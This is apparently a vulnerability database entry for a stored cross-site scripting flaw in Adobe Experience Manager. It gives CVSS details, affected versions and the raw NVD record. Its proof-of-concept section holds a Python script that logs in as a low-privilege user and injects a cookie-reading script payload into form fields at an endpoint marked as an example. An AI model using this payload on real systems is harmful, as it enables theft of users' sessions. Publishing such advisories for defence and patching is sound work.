Security Vulnerability Report
中文
CVE-2025-64799 CVSS 5.4 MEDIUM

CVE-2025-64799

Published: 2025-12-10 19:16:29
Last Modified: 2025-12-12 18:12:57

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager <= 6.5.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64799 Stored XSS PoC for Adobe Experience Manager # Target: Adobe Experience Manager <= 6.5.23 target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:4502" # Malicious XSS payload xss_payload = "<script>alert(document.cookie)</script>" # Login first with low-privilege account login_url = f"{target_url}/libs/granite/core/content/login.html" session = requests.Session() # Attempt login with low-privilege user login_data = { "j_username": "lowpriv_user", "j_password": "password", "_charset_": "utf-8" } response = session.post(login_url, data=login_data) # Inject XSS payload into vulnerable form field # Target form endpoint (example path) vulnerable_endpoint = f"{target_url}/content/forms/af/sample-form/jcr:content/guideContainer.af.submit.jsp" form_data = { "./name": f"Test User{xss_payload}", "./email": "[email protected]", "./message": f"Malicious input {xss_payload}" } inject_response = session.post(vulnerable_endpoint, data=form_data) print(f"[+] XSS payload injected: {xss_payload}") print(f"[+] Payload stored in form field") print(f"[+] Any user viewing the form will trigger the XSS")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64799", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:28.993", "lastModified": "2025-12-12T18:12:57.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}